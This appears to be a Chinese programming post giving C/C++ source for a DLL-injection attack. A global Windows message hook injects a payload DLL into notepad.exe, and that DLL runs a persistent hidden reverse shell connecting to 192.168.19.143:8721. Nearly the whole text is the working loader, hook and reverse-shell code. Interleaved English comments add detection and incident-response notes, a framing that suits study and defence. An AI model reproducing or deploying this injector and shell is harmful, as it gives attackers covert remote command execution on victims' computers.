主程序调用loader.dll,运行loader.dll中的sethook安装一个WH_GETMESSAGE的全局钩子,发现notepad进程时,loader.dll在钩子函数中加载Insert.dll,insert.dll会做坏事...
下面仅是一些关键代码,不能运行 后果自负...
1. 主程序代码:
初始化时:
// TODO: 在此添加额外的初始化代码
h_Dll = LoadLibrary("loader.dll");
if (h_Dll == NULL)
{
MessageBox("loadlibrary loader.dll error");
return FALSE;
}
执行loader.dll中的sethook函数:
typedef void (*LOAD)(HWND);
LOAD Proc = (LOAD)GetProcAddress(h_Dll, "?SetHook@@YAXPAUHWND__@@@Z");//获得导出函数
if (Proc == 0)
{
MessageBox("Get proc failed");
return;
}
Proc(m_hWnd);//执行导出函数
主程序退出时,卸载钩子:
typedef void(*UNLOAD)(void);
UNLOAD Proc = (UNLOAD)GetProcAddress(h_Dll, "?UnHook@@YAXXZ");
if (Proc == 0)
{
MessageBox("getproc unhook faild");
return;
}
Proc();
FreeLibrary(h_Dll);
2. loader.dll
//安装钩子时的回调函数
// WH_GETMESSAGE hook callback. SetHook() installs it with a thread id of 0, so
// loader.dll is mapped into the other GUI processes on the desktop and this
// routine runs inside each of them. It is the injection stage: when the host
// process's executable path matches notepad.exe it loads Insert.dll from a
// fixed on-disk path and calls that DLL's Run() export.
// Detection/mitigation notes: a system-wide SetWindowsHookEx hook, a
// LoadLibrary of a DLL from a temp-style path inside an unrelated process, and
// the debug MessageBox pop-ups below are all observable events; a hook DLL
// appearing in many processes at once is a strong signal for EDR/ETW telemetry.
LRESULT CALLBACK GetMsgProc(int code,WPARAM wParam, LPARAM lParam)
{
// Pass the message down the hook chain first; the return value is discarded.
CallNextHookEx(hHook,code,wParam,lParam);
// One-shot guard. It is a function-static inside the DLL, so every host
// process that maps loader.dll has its own copy: at most one load per process.
static bool old = false;
// Full path of the host process's executable (hModule == NULL).
char buffer[1000];
memset(buffer,0,1000);
GetModuleFileName(NULL,buffer,1000);
// Case-insensitive substring test of that path against "notepad.exe": both
// sides are uppercased heap copies (the _strdup results are not freed here).
char *InsertName = _strupr(_strdup("notepad.exe"));
char *CurrentName = _strupr(_strdup(buffer));
if (strstr(CurrentName, InsertName) != NULL && old == false)
{
// Prevent a second load on the next hooked message.
old = true;
HMODULE hDll = NULL;
// Payload is loaded from a hard-coded absolute path; that file path is the
// primary on-disk artifact to look for when triaging a host.
hDll = LoadLibrary("c:\\temp\\aa\\Insert.dll");
MessageBox(NULL,"loader.dll after loadlibrary","ddd",MB_OK);
if (hDll == NULL)
{
MessageBox(NULL, "loadlibrary Insert.dll failed","title",MB_OK);
return FALSE;
}
// Resolve the payload's entry export by its C++-decorated name. RUN is a
// function-pointer typedef defined elsewhere in the DLL (not in this listing);
// the resolved pointer is called without a NULL check.
MessageBox(NULL,"aaaa","ddd",MB_OK);
RUN Run = (RUN)GetProcAddress(hDll, "?Run@@YAXPAUHWND__@@@Z");//?Run@@YAXPAUHWND__@@@Z
// m_hWnd is the window handle the main program handed to SetHook(); it is
// forwarded to the payload.
Run(m_hWnd);
}
return TRUE;
}
//导出函数:安装钩子
// Exported entry point the main program resolves with GetProcAddress after
// LoadLibrary. Installs GetMsgProc as a WH_GETMESSAGE hook with
// dwThreadId == 0, i.e. a system-wide hook, and keeps the caller's window
// handle in the DLL-global m_hWnd for the payload. hinst and hHook are globals
// defined outside this listing (hinst is presumably the DLL's own HINSTANCE
// captured in DllMain — confirm). The SetWindowsHookEx call with a zero thread
// id is itself the event a defender would alert on: it causes this DLL to be
// loaded into other GUI processes on the same desktop.
LOADER_API void SetHook(HWND hWnd)
{
hHook = NULL;
m_hWnd = hWnd;
// The module handle must be the hook DLL so other processes can map it.
hHook = SetWindowsHookEx(WH_GETMESSAGE, GetMsgProc, hinst,0);
if (hHook == 0)
{
MessageBox(NULL, "setwindowshookEx failed","title",MB_OK);
return;
}
}
//导出函数:卸载钩子
// Exported counterpart to SetHook(): removes the global hook stored in hHook.
// Note for responders: removing the hook does not unload an Insert.dll that
// GetMsgProc already loaded into a process (it is never FreeLibrary'd), nor
// stop the thread that DLL's Run() started — those survive the unhook.
LOADER_API void UnHook()
{
BOOL bRet = UnhookWindowsHookEx(hHook);
if (bRet != TRUE)
{
MessageBox(NULL,"UnhookWindowsHookEx failed","title",MB_OK);
}
}
3.insert.dll
//工作线程
// Worker thread started by Run(). This is the actual payload: a persistent
// reverse shell. It connects out to the address/port hard-coded below and
// starts a hidden cmd.exe whose stdin/stdout/stderr are the connected socket,
// then reconnects indefinitely once that cmd.exe exits.
// Detection/mitigation notes: the injected host (notepad.exe) making outbound
// TCP connections and spawning cmd.exe with SW_HIDE and inherited socket
// handles is the signature to hunt for in process-tree and network telemetry;
// egress filtering to the unexpected destination keeps the loop stuck in
// connect() and the shell is never spawned.
DWORD WINAPI ThreadProc(LPVOID lParam)
{
MessageBox(NULL,"INSERT.DLL threadProc function..","adf",MB_OK);
WSADATA wsa;
WSAStartup(MAKEWORD(2,0),&wsa);
SOCKET sock;
PROCESS_INFORMATION pi;
STARTUPINFO si;
sockaddr_in addr;
memset(&addr,0,sizeof(addr));
memset(&pi,0,sizeof(pi));
memset(&si,0,sizeof(si));
// Fixed C2 endpoint (IPv4 address and TCP port) baked into the binary — an
// indicator that string-scanning the DLL surfaces directly.
addr.sin_family = AF_INET;
addr.sin_port = htons(8721);
addr.sin_addr.S_un.S_addr = inet_addr("192.168.19.143");
sock = WSASocket(AF_INET, SOCK_STREAM, NULL, NULL,NULL,NULL);
MessageBox(NULL,"INSERT.DLL 断开重连前","adf",MB_OK);
// Reconnect loop: there is no break, so the thread never returns and the
// WSACleanup() after the loop is unreachable in practice.
while (1)
{
MessageBox(NULL,"INSERT.DLL while.....","adf",MB_OK);
sock = WSASocket(AF_INET, SOCK_STREAM, NULL, NULL,NULL,NULL);
// Retry every 5 s until the connection succeeds. shutdown(sock, 0) only
// disables receives on the socket (SD_RECEIVE); it does not close it.
while (0 != connect(sock, (sockaddr*)&addr, sizeof(addr)))
{
shutdown(sock, 0);
Sleep(5000);
}
// Hidden child whose three standard handles are the socket itself, with
// handle inheritance enabled — the socket-backed shell pattern.
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES |STARTF_USESHOWWINDOW;
si.hStdInput = si.hStdOutput = si.hStdError = (void*)sock;
si.wShowWindow = SW_HIDE;
memset(&pi, 0, sizeof(pi));
BOOL ret = CreateProcess(NULL,"cmd.exe",NULL,NULL,true, 0,NULL,NULL,&si,&pi);
// Block until the shell exits, then drop the socket and go back to reconnecting.
WaitForSingleObject(pi.hProcess,INFINITE);
closesocket(sock);
}
WSACleanup();
return 1;
}
//导出函数
// Exported entry point of the payload, called by loader.dll's hook callback
// inside the injected process. hWnd is the main program's window handle that
// was passed through SetHook(); sending it WM_CLOSE tells the launcher to
// close — per the main-program section that exit path calls UnHook(), so the
// launcher goes away while the payload thread keeps running in the host
// (presumably the intent — confirm against the main program). hThread is a
// DLL-global defined outside this listing.
INSERT_API void Run(HWND hWnd)
{
MessageBox(NULL,"INSERT.DLL run function..","adf",MB_OK);
hThread = NULL;
// Window handle handed over from loader.dll: ask the launcher window to close.
::SendMessageA(hWnd, WM_CLOSE,0, 0);
// Start the reverse-shell worker (ThreadProc) in this process.
hThread = CreateThread(NULL, 0, ThreadProc, NULL,0, NULL);
if (0 == hThread)
{
MessageBox(NULL, "createthread failed","failed",MB_OK);
return;
}
}